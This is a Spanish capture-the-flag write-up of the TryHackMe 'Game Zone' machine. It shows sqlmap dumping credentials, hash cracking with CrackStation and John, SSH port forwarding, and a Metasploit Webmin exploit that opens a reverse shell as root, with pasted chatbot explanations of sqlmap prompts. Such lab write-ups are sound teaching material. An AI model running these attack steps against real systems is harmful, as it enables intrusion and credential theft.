| 5 | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system. |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[00:01:26] [INFO] table 'db.post' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.125.35/dump/db/post.csv'
[00:01:26] [INFO] fetching columns for table 'users' in database 'db'
[00:01:26] [INFO] fetching entries for table 'users' in database 'db'
[00:01:26] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[00:02:50] [INFO] writing hashes to a temporary file '/tmp/sqlmap56f88_r932566/sqlmaphashes-d5tvvw2y.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[00:04:06] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:04:33] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[00:05:42] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[00:05:42] [INFO] starting 2 processes
[00:06:02] [INFO] using suffix '1'
[00:06:24] [INFO] using suffix '123'
[00:06:45] [INFO] using suffix '2'
[00:07:06] [INFO] using suffix '12'
[00:07:27] [INFO] using suffix '3'
[00:07:48] [INFO] using suffix '13'
[00:08:09] [INFO] using suffix '7'
[00:08:28] [INFO] using suffix '11'
[00:08:48] [INFO] using suffix '5'
[00:09:10] [INFO] using suffix '22'
[00:09:30] [INFO] using suffix '23'
[00:09:50] [INFO] using suffix '01'
[00:10:10] [INFO] using suffix '4'
[00:10:30] [INFO] using suffix '07'
[00:10:51] [INFO] using suffix '21'
[00:11:12] [INFO] using suffix '14'
[00:11:33] [INFO] using suffix '10'
[00:11:54] [INFO] using suffix '06'
[00:12:15] [INFO] using suffix '08'
[00:12:36] [INFO] using suffix '8'
[00:12:58] [INFO] using suffix '15'
[00:13:19] [INFO] using suffix '69'
[00:13:40] [INFO] using suffix '16'
[00:14:00] [INFO] using suffix '6'
[00:14:21] [INFO] using suffix '18'
[00:14:41] [INFO] using suffix '!'
[00:15:01] [INFO] using suffix '.'
[00:15:22] [INFO] using suffix '*'
[00:15:42] [INFO] using suffix '!!'
[00:16:04] [INFO] using suffix '?'
[00:16:25] [INFO] using suffix ';'
[00:16:46] [INFO] using suffix '..'
[00:17:07] [INFO] using suffix '!!!'
[00:17:28] [INFO] using suffix ', '
[00:17:49] [INFO] using suffix '@'
[00:18:10] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
[00:18:10] [INFO] table 'db.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.125.35/dump/db/users.csv'
[00:18:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.125.35'
[00:18:10] [WARNING] your sqlmap version is outdated
[*] ending @ 00:18:10 /2024-01-31/
CONSULTAS EN ESPAÑOL QUE NOS HICO SQLMAP DURANTE EL PROCESO ESPLICADASD POR GPT:
que me consulta aca?: for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
ChatGPT
La consulta te está preguntando si deseas incluir todos los tests restantes para MySQL, manteniendo los niveles de dificultad (level) y riesgo (risk) proporcionados. Puedes responder "Y" para indicar que sí deseas incluir todos los tests restantes con los mismos niveles de dificultad y riesgo. Si prefieres personalizar los niveles o excluir algunos tests, puedes responder "n" y proporcionar instrucciones adicionales.
User
ya aca ahora que me dice ?: POST parameter 'searchitem' is vulnerable. Do you want to keep testing the others (if any)?
ChatGPT
La afirmación indica que el parámetro POST llamado 'searchitem' es vulnerable. La pregunta asociada es si deseas continuar probando los otros parámetros (si los hay). Puedes responder según tus necesidades y la naturaleza de tus pruebas de seguridad.
Si estás realizando pruebas de vulnerabilidad y quieres continuar evaluando los demás parámetros en busca de posibles vulnerabilidades, puedes responder afirmativamente ("yes" o "Y").
Si ya has identificado y abordado la vulnerabilidad en 'searchitem' y no necesitas evaluar otros parámetros, puedes responder negativamente ("no" o "n").
Recuerda que la decisión de continuar o detener las pruebas dependerá de tu contexto y los objetivos específicos de tu evaluación de seguridad.
User
perfecto sui estoy estudiando esto en tryhackme, mira que me dice ahora esta pregunta?: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
ChatGPT
La pregunta te está consultando si deseas almacenar los hashes en un archivo temporal para un procesamiento futuro con otras herramientas. Puedes responder de la siguiente manera:
Si deseas almacenar los hashes en un archivo temporal para un posible procesamiento adicional con otras herramientas, puedes responder "y" o "Y" (sí).
Si no deseas almacenar los hashes y prefieres omitir el paso de guardarlos en un archivo temporal, puedes responder "n" o "N" (no).
La elección dependerá de tus objetivos y del flujo de trabajo que estés siguiendo en tus estudios o pruebas.
User
mira lo guardo en un archivo y ahora me pregunatesto?: do you want to crack them via a dictionary-based attack? [Y/n/q]
ChatGPT
La pregunta te está preguntando si deseas intentar crackear (descifrar) los hashes utilizando un ataque basado en diccionario. Aquí están las opciones:
Si deseas intentar crackear los hashes utilizando un ataque basado en diccionario, puedes responder "Y" (sí).
Si no deseas realizar un ataque basado en diccionario y prefieres omitir este paso, puedes responder "n" (no).
Si decides abandonar la tarea por completo, puedes responder "q" (abreviatura de quit o salir).
La elección dependerá de tus objetivos y del enfoque que estés siguiendo en tus estudios o pruebas. Si estás interesado en intentar descifrar los hashes utilizando una lista de palabras, entonces puedes elegir "Y". De lo contrario, si no estás interesado en este paso específico, puedes optar por "n".
User
y ahora?: do you want to use common password suffixes? (slow!) [y/N]
ChatGPT
La pregunta te está preguntando si deseas utilizar sufijos comunes de contraseñas en el intento de descifrar los hashes. Ten en cuenta que esta opción puede hacer que el proceso sea más lento. Aquí están las opciones:
Si deseas utilizar sufijos comunes de contraseñas y estás dispuesto a aceptar la posible ralentización del proceso, puedes responder "y" (sí).
Si no deseas utilizar sufijos comunes de contraseñas y prefieres un proceso más rápido, puedes responder "n" (no).
La elección dependerá de tus objetivos y del nivel de exhaustividad que estés buscando en tus pruebas. Si estás dispuesto a esperar un poco más para probar una gama más amplia de posibles contraseñas, puedes elegir "y". Si prefieres una ejecución más rápida y estás satisfecho con la lista de palabras estándar, puedes optar por "n".
LEEMOS EL ARCHOVO TXT QUE NOS ENCONTRO SQLMAP DE LA BASE DE DATOS VULNERABLE:
┌──(root㉿kali)-[~]
└─# cat /tmp/sqlmap56f88_r932566/sqlmaphashes-d5tvvw2y.txt
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Y BINGO TAMBIEN DECIFRAMOS EL SIGNIFICADO DEL HASH DEL USUARIO AGENT47 Y EN LA PAGINA DE CRAKSTATION NOS DIO ESTO:
Free Password Hash Cracker
Enter up to 20 non-salted hashes, one per line:
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults
Hash Type Result
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 sha256 videogamer124
CONTRASEÑA: videogamer124
AGENT47:videogamer124
---------- JOHN THE RIPPER
TAMBIEN PODIAMOS DECIFRAR EL HASH EN sha-256 con jJOHN THE RIPPER:
┌──(root㉿kali)-[~]
└─# john hashagent47.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (agent47)
1g 0:00:00:01 DONE (2024-01-31 00:35) 0.5617g/s 1638Kp/s 1638Kc/s 1638KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
------------- CONECCION POR SSH
INTENTAMOS CONECTARNOS POR SSH CON LAS CREDENCIALES DEL USUARIO AGENT47 Y BINGO SE TEZO Y CONSEGUIMOS LA FLAG DEL USUARIO:
┌──(root㉿kali)-[~]
└─# ssh agent47@10.10.125.35
The authenticity of host '10.10.125.35 (10.10.125.35)' can't be established.
ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.125.35' (ED25519) to the list of known hosts.
agent47@10.10.125.35's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ ls
user.txt
agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c
agent47@gamezone:~$ sudo -l
[sudo] password for agent47:
Sorry, user agent47 may not run sudo on gamezone.
agent47@gamezone:~$ pwd
/home/agent47
--------- SEGUIMOS INVESTIGANDO EN LA MAQUINA VICTIMA CONECCIONECCIONS DE SOCKET CON SS
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
------- NAVEGADOR VEMOS EL SERVICIO QUE NOS MAQCABA POR PUERTO 10000 BLOQUEADO FIREWALL
http://10.10.125.35:10000/
No se puede acceder a este sitio10.10.125.35 rechazó la conexión.
Intenta:
Comprobar la conexión.
Comprobar el proxy y el firewall.
ERR_CONNECTION_REFUSED
---------------SSH -L EXPONIENDO UN SERVIDOR POR EL PUERTO 10000 DESDE NUESTRA MAQUINA ATACANTE
┌──(root㉿kali)-[~]
└─# ssh -L 10000:localhost:10000 agent47@10.10.125.35
agent47@10.10.125.35's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Tue Jan 30 18:37:59 2024 from 10.10.14.223
VEMOS EN EL NAVEGADOR EL NOMBRE Y LA VERSION DE CMS:
http://localhost:10000/
Login to Webmin
You must enter a username and password to login to the Webmin server on localhost.
Username
Password
Remember login permanently?
PONEMOS LAS CREDENCIALES DEL USER AGENT 47 Y LOGRAMOS VER LA VERSION DE WEBMIN:
System hostname gamezone (127.0.1.1)
Operating system Ubuntu Linux 16.04.6
Webmin version 1.580
Time on system Tue Jan 30 19:23:25 2024
Kernel and CPU Linux 4.4.0-159-generic on x86_64
Processor information Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 1 cores
System uptime 2 hours, 49 minutes
Running processes 127
CPU load averages 0.00 (1 min) 0.00 (5 mins) 0.00 (15 mins)
CPU usage 0% user, 0% kernel, 0% IO, 100% idle
Real memory 1.95 GB total, 303.78 MB used
Virtual memory 975 MB total, 0 bytes used
Local disk space 8.78 GB total, 2.82 GB used
Package updates All installed packages are up to date
-------- METASPLOIT
YA TENIENDO LA VERSION BUSCAMOS UN EXPLOIT EN METASPLOIT Y LO CONFIGURAMOS:
┌──(root㉿kali)-[~]
└─# msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > search webmin 1.580
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/admin/webmin/edit_html_fileaccess
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framewor
k/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS 10.10.182.25
RHOSTS => 10.10.182.25
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.182.25 yes The target host(s), see https://github.com/rapid7/metasploit-framewor
k/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
10 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS http://localhost:10000/ yes The target host(s), see https://github.com/rapid7/metasploit-
framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST localhost no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.239.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP double handler on 10.10.239.42:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 10.10.239.42:4444
[*] Attempting to login...
[+] Authentication successful
[+] Authentication successful
[*] Attempting to execute the payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Payload executed successfully
[*] Command: echo kTjlTWHl6TOqraNd;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "kTjlTWHl6TOqraNd\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.239.42:4444 -> 10.10.182.25:38846) at 2024-01-31 23:05:52 +0000
[*] Session 1 created in the background.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.239.42:4444 -> 10.10.182.25:38846 (127.0.0.1)
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...
ls
ACLEditor.class
ACLEntry.class
ACLWindow.class
AttributeEditor.class
AttributesWindow.class
BorderPanel.class
BorderPanel.java
CHANGELOG
CbButton.class
CbButton.java
CbButtonCallback.class
CbButtonGroup.class
CbColorButton.class
CbColorButton.java
CbColorWindow.class
CbColorWindow.java
CbColorWindowCallback.class
CbColorWindowCube.class
CbColorWindowSwatch.class
CbImageChooser.class
CbImageChooser.java
CbImageFileWindow.class
CbScrollbar.class
CbScrollbar.java
CbScrollbarArrow.class
CbScrollbarCallback.class
CbSlider.class
CbSlider.java
CbSliderCallback.class
ContentsWindow.class
DFSAdminExport.class
DeleteWindow.class
DownloadDirWindow.class
EXTWindow.class
EditorWindow.class
ErrorWindow.class
ErrorWindow.java
ExtractWindow.class
FileAttribute.class
FileManager.class
FileManager.java
FileNode.class
FileSystem.class
FindReplaceWindow.class
FixedFrame.class
FixedFrame.java
GotoWindow.class
GrayPanel.class
GrayPanel.java
Hierarchy.class
Hierarchy.java
HierarchyCallback.class
HierarchyNode.class
HistoryWindow.class
ImagePanel.class
LinedPanel.class
LinedPanel.java
LinkWindow.class
LinuxExport.class
Makefile
MkdirWindow.class
MountWindow.class
MultiColumn.class
MultiColumn.java
MultiColumnCallback.class
MultiLabel.class
OverwriteWindow.class
PermissionsPanel.class
PreviewWindow.class
PropertiesWindow.class
QuickSort.class
QuickSort.java
RemoteFile.class
RenameWindow.class
ResizePanel.class
ResizePanel.java
SambaShare.class
ScrollImage.class
SearchWindow.class
SharingWindow.class
StaticTextField.class
StaticTextField.java
StringJoiner.class
StringSplitter.class
StringSplitter.java
TabSelector.class
TabbedDisplayPanel.class
TabbedPanel.class
TabbedPanel.java
ToolbarLayout.class
ToolbarLayout.java
Util.class
Util.java
acl_security.pl
cgi_args.pl
chmod.cgi
config
config-*-linux
config-freebsd
config-irix
config-solaris
config.info
config.info.ca
config.info.cz
config.info.cz.UTF-8
config.info.de
config.info.el
config.info.es
config.info.fa
config.info.it
config.info.ko_KR.UTF-8
config.info.ko_KR.euc
config.info.nl
config.info.no
config.info.tr
contents.cgi
copy.cgi
defaultacl
delete.cgi
edit_html.cgi
extract.cgi
file-lib.pl
file.jar
filesystems.cgi
getattrs.cgi
getext.cgi
getfacl.cgi
images
index.cgi
irix-getfacl.pl
irix-setfacl.pl
lang
lang.cgi
list.cgi
list_exports.cgi
list_shares.cgi
log_parser.pl
makelink.cgi
mkdir.cgi
module.info
mount.cgi
move.cgi
preview.cgi
rename.cgi
root.cgi
save.cgi
save_export.cgi
save_html.cgi
save_share.cgi
search.cgi
setattrs.cgi
setext.cgi
setfacl.cgi
show.cgi
size.cgi
unicode
unicode.pl
upform.cgi
upload.cgi
upload2.cgi
xinha
whoami
root
BINGO YA SE TENZON CON EL EXPLOIT SELECCIONADO COMO RHOST EL LOCALHOST QUE LEVANTAMOS NOSOSTROS DESDE NUESTRA MAQUINA DONDE VIMOS LA VERSIONS DED WEBMIN; Y EL PAYLOAD QUE PUSIMOS; LO CORRIMOS Y COMO VIMOS ARRIBA LOGRO LA AUTENTICACION Y CONECCION COMO ROOT;: CONSIGUIENDO LA BANDERA:
cd root
ls
root.txt
cat root.txt
a4b945830144bdd71908d12d902adeee
pwd
/root
/////////////////FIN//////////////////Last updated